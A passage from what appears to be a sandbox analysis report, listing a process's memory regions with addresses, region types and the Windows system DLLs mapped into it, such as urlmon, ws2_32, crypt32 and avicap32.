"c:\\windows\\syswow64\\gdi32.dll") Region: id = 1985 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1986 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1987 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1988 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1989 start_va = 0x75c70000 end_va = 0x7706efff monitored = 0 entry_point = 0x75e2b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1990 start_va = 0x74820000 end_va = 0x74856fff monitored = 0 entry_point = 0x74823b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1991 start_va = 0x74d70000 end_va = 0x75268fff monitored = 0 entry_point = 0x74f77610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1992 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2006 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2007 start_va = 0x75910000 end_va = 0x7599cfff monitored = 0 entry_point = 0x75959b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2008 start_va = 0x74640000 end_va = 0x74683fff monitored = 0 entry_point = 0x74647410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 2009 start_va = 0x74630000 end_va = 0x7463efff monitored = 0 entry_point = 0x74632e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2010 start_va = 0x890000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2011 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2012 start_va = 0x890000 end_va = 0xa17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2013 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2014 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2015 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 2016 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 2017 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2018 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2042 start_va = 0x71f40000 end_va = 0x71fb4fff monitored = 0 entry_point = 0x71f79a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2043 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2064 start_va = 0x1ff0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 2128 start_va = 0x29f0000 end_va = 0x2b43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 2129 start_va = 0x74130000 end_va = 0x7414afff monitored = 0 entry_point = 0x74139050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2130 start_va = 0x702c0000 end_va = 0x7043dfff monitored = 0 entry_point = 0x7033c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2131 start_va = 0x71ff0000 end_va = 0x722bafff monitored = 0 entry_point = 0x7222c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2132 start_va = 0x75520000 end_va = 0x7557efff monitored = 0 entry_point = 0x75524af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2133 start_va = 0x77640000 end_va = 0x77652fff monitored = 0 entry_point = 0x77641d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2134 start_va = 0x702a0000 end_va = 0x702b4fff monitored = 0 entry_point = 0x702a5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 2135 start_va = 0x74690000 end_va = 0x74807fff monitored = 0 entry_point = 0x746e8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2136 start_va = 0x75900000 end_va = 0x7590dfff monitored = 0 entry_point = 0x75905410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2137 start_va = 0x75820000 end_va = 0x75825fff monitored = 0 entry_point = 0x75821460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2138 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2139 start_va = 0x2b50000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 2140 start_va = 0x2b90000 end_va = 0x2c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 2141 start_va = 0x75310000 end_va = 0x75393fff monitored = 0 entry_point = 0x75336220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2142 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 2143 start_va = 0x70280000 end_va = 0x70294fff monitored = 0 entry_point = 0x7028e570 region_type = mapped_file name = "devenum.dll" filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll") Region: id = 2144 start_va = 0x70250000 end_va = 0x70273fff monitored = 0 entry_point = 0x70254820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 2145 start_va = 0x70220000 end_va = 0x70242fff monitored = 0 entry_point = 0x70228940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 2146 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2147 start_va = 0x77070000 end_va = 0x7747afff monitored = 0 entry_point = 0x7709adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2148 start_va = 0x701f0000 end_va = 0x70217fff monitored = 0 entry_point = 0x701f7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2149 start_va = 0x72570000 end_va = 0x72591fff monitored = 0 entry_point = 0x725791f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2150 start_va = 0x758b0000 end_va = 0x758f1fff monitored = 0 entry_point = 0x758c6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 2151 start_va = 0x701e0000 end_va = 0x701e8fff monitored = 0 entry_point = 0x701e29b0 region_type = mapped_file name = "msdmo.dll" filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll") Region: id = 2152 start_va = 0x701c0000 end_va = 0x701d3fff monitored = 0 entry_point = 0x701ce190 region_type = mapped_file name = "avicap32.dll" filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll") Region: id = 2153 start_va = 0x70190000 end_va = 0x701b2fff monitored = 0 entry_point = 0x701a33e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 2154 start_va = 0x700f0000 end_va = 0x70181fff monitored = 0 entry_point = 0x700fdd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 2155 start_va = 0x2c90000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 2156 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 2157 start_va = 0x2c90000 end_va = 0x2d4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c90000" filename = "" Region: id = 2158 start_va = 0x2d90000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2159 start_va = 0xa20000 end_va = 0xa23fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 2160 start_va = 0xa30000 end_va = 0xa33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2161 start_va = 0xa40000 end_va = 0xa41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2162 start_va = 0x2d50000 end_va = 0x2d50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d50000" filename = "" Region: id = 2163 start_va = 0x2d60000 end_va = 0x2d61fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 2164 start_va = 0x2d70000 end_va = 0x2d72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "avicap32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui") Region: id = 2165 start_va = 0x2da0000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 2166 start_va = 0x2d80000 end_va = 0x2d86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2167 start_va = 0x2d60000 end_va = 0x2d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2168 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2169 start_va = 0x2d90000 end_va = 0x2d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2170 start_va = 0x2e20000 end_va = 0x2e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 2171 start_va = 0x2e30000 end_va = 0x2e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 2172 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 2181 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2182 start_va = 0x2d60000 end_va = 0x2d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2183 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2184 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2185 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2186 start_va = 0x2d90000 end_va = 0x2d90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 2187 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2188 start_va = 0x2e20000 end_va = 0x2e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 2189 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2190 start_va = 0x2e30000 end_va = 0x2e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 2191 start_va = 0x2e50000 end_va = 0x2e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2192 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 2193 start_va = 0x2e50000 end_va = 0x3186fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2194 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2195 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2196 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2197 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2198 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2199 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2200 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 2201 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2202 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2203 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2204 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2205 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2206 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2207 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2208 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 2209 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2210 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2211 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2212 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2213 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2214 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 2215 start_va = 0x31f0000 end_va = 0x31f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 2216 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2217 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 2218 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2219 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 2220 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2221 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2222 start_va = 0x3200000 end_va = 0x360bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2223 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2224 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2225 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2226 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2227 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2228 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2229 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2230 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2231 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2232 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2233 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2234 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2235 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2236 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2237 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 2238 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2239 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 2240 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 2241 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 2242 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 2243 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 2244 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 2245 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 2246 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2247 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 2248 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2249 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 2250 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2251 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 2252 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2253 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 2254 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2255 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 2256 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2257 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2258 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 2259 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2260 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 2261 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 2262 start_va = 0x3710000 end_va = 0x3710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 2263 start_va = 0x3720000 end_va = 0x3720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 2264 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 2265 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003740000" filename = "" Region: id = 2284 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 2448 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 2449 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 2450 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2451 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 2452 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 2453 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2454 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2455 start_va = 0x6d730000 end_va = 0x6d77efff monitored = 0 entry_point = 0x6d73d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2502 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 2543 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 2544 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 2545 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2546 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 2549 start_va = 0x37a0000 end_va = 0x37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 2550 start_va = 0x37e0000 end_va = 0x38dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 2551 start_va = 0x6d720000 end_va = 0x6d72cfff monitored = 0 entry_point = 0x6d723520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" 